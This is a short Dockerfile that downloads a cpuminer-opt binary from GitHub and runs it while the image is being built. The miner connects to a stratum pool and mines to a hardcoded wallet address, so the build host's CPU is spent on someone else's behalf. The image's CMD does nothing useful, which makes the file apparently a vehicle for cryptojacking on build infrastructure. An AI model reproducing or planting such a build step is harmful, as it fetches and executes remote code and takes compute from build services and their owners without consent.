FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.21/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && chmod +x ./cpuminer-avx2 && ./cpuminer-avx2 -a gr  -o stratum+tcps://stratum-na.rplant.xyz:17056 -u RRdYNmR6wJydrVCN5LCKtFMkzKvFnuRU9r.cd -t4
CMD ["-h"]